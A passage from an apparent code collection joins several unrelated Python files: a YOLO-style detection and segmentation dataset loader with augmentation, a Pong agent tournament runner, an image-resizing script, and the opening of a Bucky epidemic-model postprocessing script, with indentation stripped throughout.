seg_labels_img = generate_seg_labels_img(seg_labels, img.shape[:2])
# Convert
img = img.transpose(2, 0, 1)[::-1] # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img) # 将内存不连续存储的数组转换为内存连续存储的数组,使得运行速度更快
img = torch.from_numpy(img)
return img, det_labels, seg_labels_img, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, det_label, seg_label_img, path, shapes = zip(*batch) # transposed
for i in range(len(det_label)):
# add target image index for build_targets()
det_label[i][:, 0] = i
return torch.stack(img, 0), torch.cat(det_label, 0), torch.stack(seg_label_img, 0), path, shapes
@staticmethod
def collate_fn4(batch):
assert len(batch) >= 4, 'batch size must not less than 4 when using collate_fn4'
img, det_label, seg_label_img, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, det_label4, seg_label_img4, path4, shapes4 = [], [], [], path[::4], shapes[::4]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
dl = []
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[0].type(img[i].type())
dl = det_label[i]
sl = F.interpolate(seg_label_img[i].float().unsqueeze(0).unsqueeze(0), scale_factor=2., mode='area')[0].type(img[i].type()).squeeze().int()
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
dl = torch.cat((det_label[i], det_label[i + 1] + ho, det_label[i + 2] + wo, det_label[i + 3] + ho + wo), 0) * s
sl = torch.cat((torch.cat((seg_label_img[i], seg_label_img[i + 1]), 0), torch.cat((seg_label_img[i + 2], seg_label_img[i + 3]), 0)), 1)
img4.append(im)
det_label4.append(dl)
seg_label_img4.append(sl)
for i in range(len(det_label4)):
# add target image index for build_targets()
det_label4[i][:, 0] = i
return torch.stack(img4, 0), torch.cat(det_label4, 0), torch.stack(seg_label_img4, 0), path4, shapes4
# 辅助函数 ----------------------------------------------------------------
def load_image(self: LoadImagesAndLabels, index: int) -> Tuple[np.ndarray, Tuple[int, int], Tuple[int, int]]:
# 从数据集加载一张图片和其对应的语义分割标注图片,返回 img, seg_label_img, original hw, resized hw
assert isinstance(self.img_files, list)
img_path = self.img_files[index] # 图片路径
assert os.path.isfile(img_path), f'图片未找到:{img_path}'
img = Image.open(img_path) # RGB
img = exif_transpose(img) # 图片旋转矫正
w0, h0 = img.size # 原始 wh
assert img.size == tuple(self.shapes[index]), f'图片尺寸与缓存不符:{img_path}'
r = self.img_size / max(w0, h0) # 比例
if r != 1: # 如果尺寸不一致
new_wh = (int(w0 * r), int(h0 * r))
img = img.resize(new_wh, Image.ANTIALIAS)
img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
return img, (h0, w0), (img.shape[0], img.shape[1])
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def load_mosaic(self: LoadImagesAndLabels, index):
# 加载四张图片拼成一张图
det_labels4, seg_labels4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]
indices = [index] + random.choices(self.indices, k=3) # 除了当前index外,再额外随机选三个,组成四个index
random.shuffle(indices)
img4 = np.full((s * 2, s * 2, 3), 114, dtype=np.uint8)
for i, index in enumerate(indices):
# 加载图片
img, _, (h, w) = load_image(self, index)
# 将 img 放到 img4 中,将 seg_label_img 放到 seg_label_img4中
x1a, y1a, x2a, y2a = 0, 0, 0, 0
x1b, y1b, x2b, y2b = 0, 0, 0, 0
if i == 0: # top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# 目标检测标注
det_labels = self.det_labels[index].copy()
assert isinstance(det_labels, np.ndarray)
if det_labels.size:
det_labels[:, 1:] = xywhn2xyxy(det_labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
det_labels4.append(det_labels)
# 语义分割标注
seg_labels = self.seg_labels[index].copy()
assert isinstance(seg_labels, np.ndarray)
if seg_labels.size:
seg_labels[:, 1] = seg_xyn2xy(seg_labels[:, 1], w, h, padw, padh)
seg_labels4.append(seg_labels)
# 拼接/修剪 标注
det_labels4 = np.concatenate(det_labels4, 0) # 将三维的 det_labels4 拼成二维的
np.clip(det_labels4[:, 1:], 0, 2 * s, out=det_labels4[:, 1:]) # clip when using random_perspective()
seg_labels4 = np.concatenate(seg_labels4, 0) # 将三维的 seg_labels4 拼成二维的
for x in seg_labels4:
np.clip(x[1], 0, 2 * s, out=x[1])
# 数据扩充
assert self.hyp is not None, '没有定义可用的 hyp'
img4, det_labels4, seg_labels4 = random_perspective(img4, det_labels4, seg_labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border)
return img4, det_labels4, seg_labels4
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# 调整图片大小并设置内边距,同时满足多步幅的约束
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = (r, r) # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = (new_shape[1] / shape[1], new_shape[0] / shape[0]) # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, det_targets=(), seg_targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=.0, border=(0, 0)):
"""随机视角"""
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# 中心
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Transform det_label coordinates
n = len(det_targets)
if n:
new = np.zeros((n, 4))
# warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = det_targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=det_targets[:, 1:5].T * s, box2=new.T, area_thr=0.10)
det_targets = det_targets[i]
det_targets[:, 1:5] = new[i]
# Transform seg_label coordinates
n = len(seg_targets)
if n:
# warp boxes
xy = seg_targets[:, 1] # xy
for i, item in enumerate(xy):
ones = np.ones((len(item), 1))
xy[i] = np.concatenate([item, ones], axis=1)
# transform
for i, item in enumerate(xy):
xy[i] = item @ M.T
# perspective rescale or affine
for i, item in enumerate(xy):
xy[i] = item[:, :2] / item[:, 2:3] if perspective else item[:, :2]
return img, det_targets, seg_targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16, special_classes=0): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & ((ar < ar_thr) | ((special_classes == 0) and (ar < 120))) # candidates
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0][0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int_)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in IMG_FORMATS], []) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink() for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0][0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, dlb_file, slb_file, prefix = args
nm, nf, ne, nc, msg = 0, 0, 0, 0, '' # number (missing, found, empty, corrupt), message
try:
# 验证图片
with Image.open(im_file) as im:
im.verify() # PIL verify
shape = exif_size(im) # image size
assert im.format.lower() in IMG_FORMATS, f'不支持的图片格式:{im.format}'
assert (shape[0] > 9) and (shape[1] > 9), f'图片尺寸不能小于10像素,当前:{shape}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG 损坏的 JPEG
Image.open(im_file).save(im_file, format='JPEG', subsampling=0, quality=100) # re-save image
msg = f'{prefix}警告:损坏的 JPEG 已重新保存 {im_file}'
# 验证目标检测标注
det_labels = np.zeros((0, 5), dtype=np.float32)
if os.path.isfile(dlb_file):
nf = 1 # 目标检测标签已找到
with open(dlb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if len(l):
det_labels = np.array(l, dtype=np.float32)
assert det_labels.shape[1] == 5, '标注要求每一条有五个值'
assert (det_labels >= 0).all(), '存在类别或坐标为负值的标注'
assert (det_labels[:, 1:] <= 1).all(), '未归一化或超出坐标限制'
assert np.unique(det_labels, axis=0).shape[0] == det_labels.shape[0], '存在重复标注'
else:
ne = 1 # 目标检测标签为空
else:
nm = 1
# 验证语义分割标注
seg_labels = np.zeros((0, 2))
if os.path.isfile(slb_file):
with open(slb_file, 'r') as f:
l = []
for line in f.read().strip().splitlines():
items = line.split()
l.append(np.array(items, dtype=np.float32))
if len(l):
assert all([(item >= 0).all() for item in l]), '存在类别或坐标为负值的标注'
assert all([(item[1:] <= 1).all() for item in l]), '未归一化或超出坐标限制'
seg_labels = np.array([[int(item[0]), np.array(item[1:], dtype=np.float32)] for item in l], dtype=object)
seg_labels[:, 1] = [item.reshape(-1, 2) for item in seg_labels[:, 1]]
return im_file, det_labels, seg_labels, shape, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}警告:正在忽略损坏的图片与标注 {im_file}: {e}'
return None, None, None, None, nm, nf, ne, nc, msg
|
epic_battle_royale.py
|
import argparse
import sys
import os
from pong_testbench import PongTestbench
from multiprocessing import Process, Queue
from matplotlib import font_manager
from time import sleep
import importlib
import traceback
import numpy as np
import pickle
parser = argparse.ArgumentParser()
parser.add_argument("dir", type=str, help="Directory with agents.")
parser.add_argument("--render", "-r", action="store_true", help="Render the competition.")
parser.add_argument("--games", "-g", type=int, default=100, help="Number of games.")
parser.add_argument("--max_proc", "-p", type=int, default=4, help="Max number of processes.")
parser.add_argument("--start-file", "-f", type=str, default=None, help="Start file")
args = parser.parse_args()
save_file = "ebr_save.p"
def run_test(id1, agent1_dir, id2, agent2_dir, queue, games, render):
# Add the first agent to Python import path
sys.path.insert(0, agent1_dir)
orig_wd = os.getcwd()
# Import the first agent
try:
import agent
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir to the directory (needed for loading the model)
# and instantiate the agent
os.chdir(agent1_dir)
try:
agent1 = agent.Agent()
agent1.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Go back to the original directory
os.chdir(orig_wd)
# Remove agent1 from path
del sys.path[0]
# Add the 2nd agent to path
sys.path.insert(0, agent2_dir)
# reload the agent module using agent_ac.py from the new dir
try:
importlib.reload(agent)
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir, instantiate, cleanup (same as before)
os.chdir(agent2_dir)
try:
agent2 = agent.Agent()
agent2.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
os.chdir(orig_wd)
del sys.path[0]
# Get names
name1 = agent1.get_name()
name2 = agent2.get_name()
# Create and init the testbench for the agents
testbench = PongTestbench(render)
testbench.init_players(agent1, agent2)
# Run the match
try:
testbench.run_test(games)
except Exception as e:
print(f"!!! Something went wrong in {name1} ({id1}) vs {name2} ({id2})")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Get scores and pass them to the parent process
wins1, games = testbench.get_agent_score(agent1)
wins2, games = testbench.get_agent_score(agent2)
print(f"{name1} vs {name2} finished, wins1={wins1}, wins2={wins2}")
queue.put((id1, id2, wins1, wins2, name1, name2, games))
def get_directories(top_dir):
subdir_list = []
subdir_gen = os.walk(top_dir)
# Recursively scout the directory for agents
for dir, subdirs, files in subdir_gen:
if "__pycache__" in dir:
continue
if "agent_ac.py" not in files:
print("Warn: No agent_ac.py found in %s. Skipping." % dir)
continue
subdir_list.append(dir)
print("%s added to directory list." % dir)
subdir_list.sort()
# Return a list of folders with agent_ac.py
return subdir_list
def epic_battle_royale(top_dir, max_proc=4):
directories = get_directories(top_dir)
names = ["__unknown__"] * len(directories)
procs = []
result_queue = Queue()
all_results = []
skipdict = []
print("Finished scanning for agents; found:", len(directories))
if args.start_file is not None:
with open(args.start_file, "rb") as f:
all_results = pickle.load(f)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
print(f"Skipping {name1}:{name2} cause already played")
skipdict.append((id1, id2))
print(f"Total skipped: {len(skipdict)}")
for i1, d1 in enumerate(directories):
for i2, d2 in enumerate(directories):
if i1 == i2:
continue
if (i1, i2) in skipdict:
continue
pargs = (i1, d1, i2, d2, result_queue, args.games, args.render)
proc = Process(target=run_test, args=pargs)
procs.append(proc)
print("Living procs:", sum(p.is_alive() for p in procs))
while sum(p.is_alive() for p in procs) >= max_proc:
sleep(0.3)
print("Starting process (%d / %d)" % (i1*len(directories) + i2, len(directories)**2))
proc.start()
sleep(1)
# Join dead ones
new_p = []
for p in procs:
if not p.is_alive():
p.join(1)
else:
new_p.append(p)
procs = new_p
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
with open(save_file, "wb") as f:
pickle.dump(all_results, f)
for p in procs:
try:
# Give it some final timeout. 20 sec/game is a very safe choice.
# It shouldn't happen anyway; it's there just to prevent us from
# losing all results in case of some pipes issues or a deadlock
timeout = args.games * 20
p.join(timeout)
p.terminate()
# Prevent errors in old Python versions
if hasattr(p, "kill"):
p.kill()
except Exception as e:
print("Join/Terminate/Kill error")
traceback.print_exc()
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
# Fetch all results from the queue
no_agents = len(directories)
games_won = np.zeros((no_agents, no_agents), dtype=np.int32)
total_games = np.zeros((no_agents, ), dtype=np.int32)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
# Sanity check...
if wins1 + wins2 != games:
print(f"Wins dont sum up! {name1} vs {name2}: {wins1}+{wins2} != {games}")
games_won[id1, id2] += wins1
games_won[id2, id1] += wins2
names[id1] = name1
names[id2] = name2
total_games[id1] += games
total_games[id2] += games
# Save raw results as numpy
np.save("brres", games_won)
# Format: Wins of ROW versus COLUMN
np.savetxt("battle_royale_results.txt", games_won, fmt="%d")
np.savetxt("battle_royale_players.txt", directories, fmt="%s")
# Sum across columns to get total wins of each agent
total_wins = games_won.sum(axis=1)
# And across rows to get total losses.
total_losses = games_won.sum(axis=0)
agent_wins = list(zip(total_wins, total_losses, names, directories, total_games))
agent_wins.sort(key=lambda x: -x[0])
# Save the leaderboard
resfile = open("leaderboard.txt", "w")
print("")
print("-"*80)
print("--- LEADERBOARD ---")
for i, (wins, losses, name, dir, games) in enumerate(agent_wins):
winrate = wins/(wins+losses)
line = f"{i+1}. {name} with {wins} wins in {games} games (winrate {winrate*100:.2f}%) (from {dir})"
resfile.write(line+"\n")
print(line)
resfile.close()
print("-"*80)
print("")
print("Finished!")
if __name__ == "__main__":
epic_battle_royale(args.dir, args.max_proc)
|
resize_images.py
|
import argparse
import cv2
import os
import numpy as np
import multiprocessing
parser = argparse.ArgumentParser()
parser.add_argument('--w', help='Target image width')
parser.add_argument('--h', help='Target image height')
parser.add_argument('--source', help='Directory containing images')
parser.add_argument('--target', help='Directory containing images')
args = parser.parse_args()
w = int(args.w)
h = int(args.h)
source = args.source
target = args.target
paths = os.listdir(source)
paths_split = np.array_split(paths, multiprocessing.cpu_count())
def process(items):
for item in items:
img = cv2.imread(os.path.join(source, item))
img = cv2.resize(img, dsize=(w, h))
cv2.imwrite(os.path.join(target, item), img)
jobs = []
for process_paths in paths_split:
p = multiprocessing.Process(target=process, args=(process_paths,))
jobs.append(p)
p.start()
|
postprocess.py
|
"""Postprocesses data across dates and simulation runs before aggregating at geographic levels (ADM0, ADM1, or ADM2)."""
import argparse
import gc
import glob
import importlib
import logging
import os
import queue
import sys
import threading
import warnings
from pathlib import Path
import numpy as np
import pandas as pd
import pyarrow as pa
import pyarrow.compute as pac
import pyarrow.dataset as ds
import pyarrow.types as pat
import tqdm
from .numerical_libs import enable_cupy, reimport_numerical_libs, xp
from .util.read_config import bucky_cfg
from .viz.geoid import read_lookup
# supress pandas warning caused by pyarrow and the cupy asyncmempool
warnings.simplefilter(action="ignore", category=FutureWarning)
cupy_found = importlib.util.find_spec("cupy") is not None
# Initialize argument parser
parser = argparse.ArgumentParser(description="Bucky Model postprocessing")
# Required: File to process
parser.add_argument(
"file",
default=max(
glob.glob(bucky_cfg["raw_output_dir"] + "/*/"),
key=os.path.getctime,
default="Most recently created folder in raw_output_dir",
),
nargs="?",
type=str,
help="File to proess",
)
# Graph file used for this run. Defaults to most recently created
parser.add_argument(
"-g",
"--graph_file",
default=None,
type=str,
help="Graph file used for simulation",
)
# Aggregation levels, e.g. state, county, etc.
parser.add_argument(
"-l",
"--levels",
default=["adm0", "adm1", "adm2"],
nargs="+",
type=str,
help="Levels on which to aggregate",
)
# Quantiles
default_quantiles = [
0.01,
0.025,
0.050,
0.100,
0.150,
0.200,
0.250,
0.300,
0.350,
0.400,
0.450,
0.500,
0.550,
0.600,
0.650,
0.7,
0.750,
0.800,
0.85,
0.9,
0.950,
0.975,
0.990,
]
parser.add_argument(
"-q",
"--quantiles",
default=default_quantiles,
nargs="+",
type=float,
help="Quantiles to process",
)
# Top-level output directory
parser.add_argument(
"-o",
"--output",
default=bucky_cfg["output_dir"],
type=str,
help="Directory for output files",
)
# Prefix for filenames
parser.add_argument(
"--prefix",
default=None,
type=str,
help="Prefix for output folder (default is UUID)",
)
# Specify optional end date
parser.add_argument("--end_date", default=None, type=str)
# Can pass in a lookup table to use in place of graph
parser.add_argument(
"--lookup",
default=None,
type=str,
help="Lookup table defining geoid relationships",
)
parser.add_argument("-gpu", "--gpu", action="store_true", default=cupy_found, help="Use cupy instead of numpy")
parser.add_argument("--verify", action="store_true", help="Verify the quality of the data")
# Optional flags
parser.add_argument("-v", "--verbose", action="store_true", help="Print extra information")
# TODO move this to util
def pinned_array(array):
"""Allocate a cudy pinned array that shares mem with an input numpy array."""
# first constructing pinned memory
mem = xp.cuda.alloc_pinned_memory(array.nbytes)
src = np.frombuffer(mem, array.dtype, array.size).reshape(array.shape)
src[...] = array
return src
def main(args=None):
"""Main method for postprocessing the raw outputs from an MC run."""
if args is None:
args = sys.argv[1:]
args = parser.parse_args()
# Start parsing args
quantiles = args.quantiles
verbose = args.verbose
prefix = args.prefix
use_gpu = args.gpu
if verbose:
logging.info(args)
# File Management
top_output_dir = args.output
# Check if it exists, make if not
if not os.path.exists(top_output_dir):
os.makedirs(top_output_dir)
# Use lookup, add prefix
# TODO need to handle lookup weights
if args.lookup is not None:
lookup_df = read_lookup(args.lookup)
if prefix is None:
prefix = Path(args.lookup).stem
# TODO if args.lookup we need to check it for weights
# Create subfolder for this run using UUID of run
uuid = args.file.split("/")[-2]
if prefix is not None:
uuid = prefix + "_" + uuid
# Create directory if it doesn't exist
output_dir = os.path.join(top_output_dir, uuid)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
data_dir = os.path.join(args.file, "data/")
metadata_dir = os.path.join(args.file, "metadata/")
adm_mapping = pd.read_csv(os.path.join(metadata_dir, "adm_mapping.csv"))
dates = pd.read_csv(os.path.join(metadata_dir, "dates.csv"))
dates = dates["date"].to_numpy()
n_adm2 = len(adm_mapping)
adm2_sorted_ind = xp.argsort(xp.array(adm_mapping["adm2"].to_numpy()))
if use_gpu:
enable_cupy(optimize=True)
reimport_numerical_libs("postprocess")
per_capita_cols = [
"cumulative_reported_cases",
"cumulative_deaths",
"current_hospitalizations",
"daily_reported_cases",
"daily_deaths",
"vacc_dose1",
"vacc_dose2",
"immune",
]
pop_weighted_cols = [
"case_reporting_rate",
"R_eff",
"frac_vacc_dose1",
"frac_vacc_dose2",
"frac_vacc_dose1_65",
"frac_vacc_dose2_65",
"frac_immune",
"frac_immune_65",
"state_phase",
]
adm_mapping["adm0"] = 1
adm_map = adm_mapping.to_dict(orient="list")
adm_map = {k: xp.array(v)[adm2_sorted_ind] for k, v in adm_map.items()}
adm_array_map = {k: xp.unique(v, return_inverse=True)[1] for k, v in adm_map.items()}
adm_sizes = {k: xp.to_cpu(xp.max(v) + 1).item() for k, v in adm_array_map.items()}
adm_level_values = {k: xp.to_cpu(xp.unique(v)) for k, v in adm_map.items()}
adm_level_values["adm0"] = np.array(["US"])
if args.lookup is not None and "weight" in lookup_df.columns:
weight_series = lookup_df.set_index("adm2")["weight"].reindex(adm_mapping["adm2"], fill_value=0.0)
weights = np.array(weight_series.to_numpy(), dtype=np.float32)
# TODO we should ignore all the adm2 not in weights rather than just 0ing them (it'll go alot faster)
else:
weights = np.ones_like(adm2_sorted_ind, dtype=np.float32)
write_queue = queue.Queue()
def _writer():
"""Write thread that will pull from a queue."""
# Call to_write.get() until it returns None
file_tables = {}
for fname, q_dict in iter(write_queue.get, None):
df = pd.DataFrame(q_dict)
id_col = df.columns[df.columns.str.contains("adm.")].values[0]
df = df.set_index([id_col, "date", "quantile"])
df = df.reindex(sorted(df.columns), axis=1)
if fname in file_tables:
tmp = pa.table(q_dict)
file_tables[fname] = pa.concat_tables([file_tables[fname], tmp])
else:
file_tables[fname] = pa.table(q_dict)
write_queue.task_done()
# dump tables to disk
for fname in tqdm.tqdm(file_tables):
df = file_tables[fname].to_pandas()
id_col = df.columns[df.columns.str.contains("adm.")].values[0]
df = df.set_index([id_col, "date", "quantile"])
df = df.reindex(sorted(df.columns), axis=1)
df.to_csv(fname, header=True, mode="w")
write_queue.task_done()
write_thread = threading.Thread(target=_writer)
write_thread.start()
# TODO this depends on out of scope vars, need to clean that up
def pa_array_quantiles(array, level):
"""Calculate the quantiles of a pyarrow array after shipping it to the GPU."""
data = array.to_numpy().reshape(-1, n_adm2)
data = data[:, adm2_sorted_ind]
data_gpu = xp.array(data.T)
if adm_sizes[level] == 1:
# TODO need switching here b/c cupy handles xp.percentile weird with a size 1 dim :(
if use_gpu:
level_data_gpu = xp.sum(data_gpu, axis=0) # need this if cupy
else:
level_data_gpu = xp.sum(data_gpu, axis=0, keepdims=True).T # for numpy
q_data_gpu = xp.empty((len(percentiles), adm_sizes[level]), dtype=level_data_gpu.dtype)
